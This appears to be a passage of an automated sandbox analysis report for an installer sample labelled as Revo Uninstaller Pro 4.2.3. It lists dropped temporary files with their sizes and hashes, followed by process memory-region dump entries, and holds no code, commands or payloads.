    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      e392c5c713ad0018abb4f45628de51b4

      SHA1

      f2571c511d0a069d8bdfe6871dcad275bee4e61d

      SHA256

      cb39645415e4ab58c46c11339c6911410576cb3f7b007c4b94e4186bd774106b

      SHA512

      3627c1c083db9138e32a5e56682e8095168c40a48d665149661c8ba02db3cdb3fb06ff35ee4fe04362051a1a3652877870080ed3e67dd5fa0a3d0ee83cfc0650

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      c8a5886c771537c964f7a40c89ae6717

      SHA1

      11a3fff50a23801ac6bf983b2aac47e327232188

      SHA256

      6be0acd542e8d57c70a5651834689af6f5ba121989b3245050232cc8e10ce673

      SHA512

      769f194aae240b43b76f13b10fcad7fb4803aa4b6c13fab90ebb88620b0a64a10c7024a633d5f78ba62389151942558f9f84ab7dc13141b68745ba3295828966

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      44245f8ebbded7304e17471ea784e887

      SHA1

      f50f28de1e026e33ac619689b8849fdee256d960

      SHA256

      7fcaf672964a43992786d80988393373975a47dd56a8691fe8e9b8147276d6ac

      SHA512

      51c698011fd498c0e070fcac257f36ec0ce9e858e0d2ca43d86df788d121aa56206c804d6399d8c536f119f5aa906879929878d2ba28fe9dc09c279e7269119c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      d83846e86213dd6ad345b86a8e0a3c90

      SHA1

      be433e7cb79dd21c291150e43fe5d64650a8d83e

      SHA256

      d62e3afd4627e959121a938eb7ad614e1678af565a049420de1c461e8d0a68f7

      SHA512

      d0bdc2be95fde0a783c42ddc6e1067c31a6086aa4f749889a3c27047dc0ac139c56ac20d06b44900ace23a72073652597b926d7f523bf446291d6fa28f89d7e3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      5fdf006c3ffcf4de78a3047492f469d4

      SHA1

      5c6f3d76f1f8e0ddf085efb3b2da3cd1827891f9

      SHA256

      8543336b956a29d166f9b34a429e87c7b5312cb234667ea99e062d604fb4db59

      SHA512

      c0573db937071f9cc52b1288aea12e7478b58c999c7cf895bef5c3b4a8923ac55ba5b39f42a0648f201f14fb3651710d549954d9e4ac208b044f45eab6221797

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      12174bc9f2c204e7051414d5b28f9caa

      SHA1

      1e78dd66e0b68882c9e62b931cf8fdc1f8889501

      SHA256

      2c37bd96a4abee314533a9527195b5ade423a248b3c24ffa7040523dbd39f2c9

      SHA512

      d6f4dbfbd3d216213d8b18c1ceccab3472305a020925c291109b8f289330aedd6b103c1a5f6873a993b4043bf2840ea5962db753e4783f9915098bffe996a0a9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      ff647680656c739de778b60d5a6ad18a

      SHA1

      0ccfca69038eae7a0b8bc1f2119e4260fc7606c9

      SHA256

      980eee09a920c0a57013bf83d4ab5968172088033ff3f04e6c6b4d2894b3f7b0

      SHA512

      9d72c870ae112441458142d23d9eeffedecbc8321a2234f04b123927cf35de730c60dff0af74828c889bc86894aeb44dbe6033ac183cdd0f9dd4e0271bc1e0fc

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      6cccb20ffc1c419aed3206244febfdfa

      SHA1

      c1341eb4a1da52e27d0ab79985f147eb572055fe

      SHA256

      167dfecf46fee7518c2346b53a8e04f33f37cf7c942c177dc06418862c5bf50d

      SHA512

      13021926c2c988b516a7a67bb731766fd522ce309d17779a2f57d5e5cdf5d8727d3f4fb6b3c920f7ef295adbe57437bc9bf3c0b41a378cf306808c4f6c936b93

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      807481dcc513fb84fafc301eae38f3a0

      SHA1

      ef24d94b413a56bee8229aa3bbb85f4e4b2985f2

      SHA256

      5d24902df794e12b596f3cead377268b3c0c3f5fdd12581f3fce43d0f9d2951c

      SHA512

      08dadd5ca750c880c08ebce06fb99ee14f48e4f0afec642ba9baf1b545ba849adf146d52f683b956ade92edff9807fd40dde8fa9032aed4925ece129c0be617c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      882504fe3334b2858293fb0dc9a3446b

      SHA1

      d63bd321c1b08ea7da932c7c8290d05789ab33b7

      SHA256

      dce001d40e079fb555de366a42a523329bff6c0b825c4e6d36e6fce92b6b2a33

      SHA512

      6ec96673a595fb0c25c9ea9c567b084aafe6dd934ead3f0dfe26208667c9115b49962edbd1bad6710bd5e87884792c902ab0d98d28059f37cc2bfe14d558ba73

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      01b7b9ec8b0eba130b153eba568b87dd

      SHA1

      39578e8ca4b8b08a588cccf0e8d3e98e495cf5f2

      SHA256

      7fd05d82c7fef5f553ac38d930872588121763210241215cbcee134f7995a338

      SHA512

      7b953bf6fa5c6e9f6005e3312c60bc6534a3e9c14bd51dcc8f2bf997de4ce8d5d6724195ad2c9368697806ff71fe8e96f95b8410ab960ce69df377f266ecbb68

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      2963cc4597f4f527c2dbc3a3e931c1fd

      SHA1

      fa89f5273aec3c2085faf56f0ed9271aaafc7e4e

      SHA256

      26fa0205b1db9cea37a3bc289493d7b52fce36b6c23ae11b989e5c5a8f085c05

      SHA512

      714354e9829684595e68534df394fb5ae90571b7d9ce904d64b7c9df8cb7cf58480b082d32418e31c95caea04a9a8b1b0061eb783b6d67e3d4b79dbff921ef97

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ivw14swt.yqf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\is-13K42.tmp\_isetup\_iscrypt.dll

      Filesize

      2KB

      MD5

      a69559718ab506675e907fe49deb71e9

      SHA1

      bc8f404ffdb1960b50c12ff9413c893b56f2e36f

      SHA256

      2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

      SHA512

      e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

    • C:\Users\Admin\AppData\Local\Temp\is-8GH93.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp

      Filesize

      3.0MB

      MD5

      40a7717c92235c89dfcc686c6c944653

      SHA1

      7a625cd006a6fbaa90f777b03e920e195fa3edd9

      SHA256

      a1ddf79410b81fd2368c0b02fa30e10a1029c994216b67bab98b7d7ffd63d9a5

      SHA512

      c98a32f9034c931538ef5f74aa177c63334cf1b562c97450985b04813bcf8d7b5e66d58ab68d23673a634260aab7be4c7873e1badfdd1262c2dc37464fac61d7

    • C:\Users\Admin\AppData\Local\Temp\is-IOEEL.tmp\Revo Uninstaller Pro 4.2.3.tmp

      Filesize

      982KB

      MD5

      74f1186a6d3bc01716681712c6b24a74

      SHA1

      9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18

      SHA256

      d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d

      SHA512

      bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

    • C:\Users\Admin\AppData\Local\Temp\is-M9FFL.tmp\b2p.dll

      Filesize

      22KB

      MD5

      ab35386487b343e3e82dbd2671ff9dab

      SHA1

      03591d07aea3309b631a7d3a6e20a92653e199b8

      SHA256

      c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

      SHA512

      b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

    • C:\Users\Admin\AppData\Local\Temp\is-M9FFL.tmp\botva2.dll

      Filesize

      37KB

      MD5

      67965a5957a61867d661f05ae1f4773e

      SHA1

      f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

      SHA256

      450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

      SHA512

      c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

    • C:\Users\Admin\AppData\Local\Temp\is-M9FFL.tmp\iswin7logo.dll

      Filesize

      39KB

      MD5

      1ea948aad25ddd347d9b80bef6df9779

      SHA1

      0be971e67a6c3b1297e572d97c14f74b05dafed3

      SHA256

      30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

      SHA512

      f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

    • C:\Users\Admin\AppData\Local\VS Revo Group\Revo Uninstaller Pro\data\cachedata.dat

      Filesize

      42KB

      MD5

      8270ab5adab435c3260087d6780416ef

      SHA1

      8b86bab8a4224afb4fdfead513e11eeff00f932c

      SHA256

      f35e773b5c8c345e5ef14e0279a161d5cf8475e96a121e404e0fc00335673acf

      SHA512

      807fae012a619201512741fe6a651046bc21c5a4d3879b4115ac62840558b7e95c300614eb7d23f7669855df22a790d9add39cddccc30d8689714e544215be4d

    • memory/676-0-0x0000000000400000-0x00000000004DC000-memory.dmp

      Filesize

      880KB

    • memory/676-68-0x0000000000400000-0x00000000004DC000-memory.dmp

      Filesize

      880KB

    • memory/676-2-0x0000000000401000-0x00000000004B7000-memory.dmp

      Filesize

      728KB

    • memory/700-282-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/828-133-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/828-131-0x0000000006000000-0x0000000006354000-memory.dmp

      Filesize

      3.3MB

    • memory/936-530-0x0000000007970000-0x0000000007981000-memory.dmp

      Filesize

      68KB

    • memory/936-529-0x0000000007420000-0x00000000074C3000-memory.dmp

      Filesize

      652KB

    • memory/936-519-0x000000006F2B0000-0x000000006F2FC000-memory.dmp

      Filesize

      304KB

    • memory/936-531-0x00000000079C0000-0x00000000079D4000-memory.dmp

      Filesize

      80KB

    • memory/936-518-0x0000000006480000-0x00000000064CC000-memory.dmp

      Filesize

      304KB

    • memory/956-493-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

    • memory/1232-600-0x0000000006DD0000-0x0000000006E73000-memory.dmp

      Filesize

      652KB

    • memory/1232-603-0x00000000070B0000-0x00000000070C4000-memory.dmp

      Filesize

      80KB

    • memory/1232-582-0x00000000054A0000-0x00000000057F4000-memory.dmp

      Filesize

      3.3MB

    • memory/1232-584-0x0000000005B70000-0x0000000005BBC000-memory.dmp

      Filesize

      304KB

    • memory/1232-602-0x0000000007070000-0x0000000007081000-memory.dmp

      Filesize

      68KB

    • memory/1232-589-0x0000000073370000-0x00000000733BC000-memory.dmp

      Filesize

      304KB

    • memory/1328-570-0x00000000070B0000-0x00000000070C4000-memory.dmp

      Filesize

      80KB

    • memory/1328-568-0x0000000007070000-0x0000000007081000-memory.dmp

      Filesize

      68KB

    • memory/1328-543-0x000000006F2B0000-0x000000006F2FC000-memory.dmp

      Filesize

      304KB

    • memory/1360-585-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

    • memory/1692-481-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/2000-614-0x0000000005B60000-0x0000000005EB4000-memory.dmp

      Filesize

      3.3MB

    • memory/2000-616-0x0000000006300000-0x000000000634C000-memory.dmp

      Filesize

      304KB

    • memory/2000-627-0x0000000007470000-0x0000000007513000-memory.dmp

      Filesize

      652KB

    • memory/2000-617-0x0000000074E10000-0x0000000074E5C000-memory.dmp

      Filesize

      304KB

    • memory/2000-628-0x00000000077C0000-0x00000000077D1000-memory.dmp

      Filesize

      68KB

    • memory/2000-629-0x0000000007810000-0x0000000007824000-memory.dmp

      Filesize

      80KB

    • memory/2024-113-0x0000000007690000-0x0000000007726000-memory.dmp

      Filesize

      600KB

    • memory/2024-98-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/2024-80-0x00000000027F0000-0x0000000002826000-memory.dmp

      Filesize

      216KB

    • memory/2024-81-0x00000000052E0000-0x0000000005908000-memory.dmp

      Filesize

      6.2MB

    • memory/2024-82-0x0000000005140000-0x0000000005162000-memory.dmp

      Filesize

      136KB

    • memory/2024-83-0x0000000005A40000-0x0000000005AA6000-memory.dmp

      Filesize

      408KB

    • memory/2024-84-0x0000000005AB0000-0x0000000005B16000-memory.dmp

      Filesize

      408KB

    • memory/2024-94-0x0000000005B20000-0x0000000005E74000-memory.dmp

      Filesize

      3.3MB

    • memory/2024-95-0x0000000006100000-0x000000000611E000-memory.dmp

      Filesize

      120KB

    • memory/2024-96-0x0000000006120000-0x000000000616C000-memory.dmp

      Filesize

      304KB

    • memory/2024-97-0x00000000072A0000-0x00000000072D2000-memory.dmp

      Filesize

      200KB

    • memory/2024-118-0x0000000007730000-0x0000000007738000-memory.dmp

      Filesize

      32KB

    • memory/2024-117-0x0000000007750000-0x000000000776A000-memory.dmp

      Filesize

      104KB

    • memory/2024-108-0x00000000066D0000-0x00000000066EE000-memory.dmp

      Filesize

      120KB

    • memory/2024-116-0x0000000007650000-0x0000000007664000-memory.dmp

      Filesize

      80KB

    • memory/2024-115-0x0000000007640000-0x000000000764E000-memory.dmp

      Filesize

      56KB

    • memory/2024-109-0x00000000072E0000-0x0000000007383000-memory.dmp

      Filesize

      652KB

    • memory/2024-110-0x0000000007A60000-0x00000000080DA000-memory.dmp

      Filesize

      6.5MB

    • memory/2024-111-0x0000000007410000-0x000000000742A000-memory.dmp

      Filesize

      104KB

    • memory/2024-112-0x0000000007490000-0x000000000749A000-memory.dmp

      Filesize

      40KB

    • memory/2024-114-0x0000000007610000-0x0000000007621000-memory.dmp

      Filesize

      68KB

    • memory/2164-214-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/2228-180-0x00000000062A0000-0x00000000062C2000-memory.dmp

      Filesize

      136KB

    • memory/2228-181-0x0000000007380000-0x0000000007924000-memory.dmp

      Filesize

      5.6MB

    • memory/2236-159-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/2376-684-0x0000000005400000-0x000000000544C000-memory.dmp

      Filesize

      304KB

    • memory/2376-683-0x00000000053C0000-0x00000000053FC000-memory.dmp

      Filesize

      240KB

    • memory/2376-682-0x0000000005460000-0x000000000556A000-memory.dmp

      Filesize

      1.0MB

    • memory/2376-676-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/2376-681-0x0000000005330000-0x0000000005342000-memory.dmp

      Filesize

      72KB

    • memory/2376-680-0x00000000058D0000-0x0000000005EE8000-memory.dmp

      Filesize

      6.1MB

    • memory/2380-193-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/2392-6-0x0000000000400000-0x0000000000716000-memory.dmp

      Filesize

      3.1MB

    • memory/2392-52-0x0000000000400000-0x0000000000716000-memory.dmp

      Filesize

      3.1MB

    • memory/2448-235-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/2804-439-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/3000-143-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3000-567-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3000-32-0x0000000000400000-0x0000000000429000-memory.dmp

      Filesize

      164KB

    • memory/3544-641-0x0000000005F90000-0x0000000005FDC000-memory.dmp

      Filesize

      304KB

    • memory/3584-256-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/3980-672-0x0000000005770000-0x0000000005792000-memory.dmp

      Filesize

      136KB

    • memory/3980-669-0x0000000000CE0000-0x0000000000DB4000-memory.dmp

      Filesize

      848KB

    • memory/3980-675-0x0000000006F70000-0x0000000006F9E000-memory.dmp

      Filesize

      184KB

    • memory/3980-674-0x0000000006F10000-0x0000000006F6E000-memory.dmp

      Filesize

      376KB

    • memory/3980-673-0x0000000006E10000-0x0000000006EAC000-memory.dmp

      Filesize

      624KB

    • memory/3980-671-0x0000000005740000-0x000000000574A000-memory.dmp

      Filesize

      40KB

    • memory/3980-670-0x00000000056A0000-0x0000000005732000-memory.dmp

      Filesize

      584KB

    • memory/4404-408-0x00000000078A0000-0x0000000007943000-memory.dmp

      Filesize

      652KB

    • memory/4404-413-0x0000000007C20000-0x0000000007C34000-memory.dmp

      Filesize

      80KB

    • memory/4404-398-0x0000000073C00000-0x0000000073C4C000-memory.dmp

      Filesize

      304KB

    • memory/4992-145-0x00000000745C0000-0x00000000745DB000-memory.dmp

      Filesize

      108KB

    • memory/4992-507-0x0000000009850000-0x000000000985F000-memory.dmp

      Filesize

      60KB

    • memory/4992-50-0x00000000745C0000-0x00000000745DB000-memory.dmp

      Filesize

      108KB

    • memory/4992-267-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/4992-76-0x0000000075440000-0x0000000075451000-memory.dmp

      Filesize

      68KB

    • memory/4992-74-0x0000000009850000-0x000000000985F000-memory.dmp

      Filesize

      60KB

    • memory/4992-506-0x0000000075440000-0x0000000075451000-memory.dmp

      Filesize

      68KB

    • memory/4992-505-0x00000000745C0000-0x00000000745DB000-memory.dmp

      Filesize

      108KB

    • memory/4992-504-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/4992-566-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/4992-144-0x0000000000400000-0x0000000000509000-memory.dmp

      Filesize

      1.0MB

    • memory/4992-146-0x0000000075440000-0x0000000075451000-memory.dmp

      Filesize

      68KB

    • memory/4992-147-0x0000000009850000-0x000000000985F000-memory.dmp

      Filesize

      60KB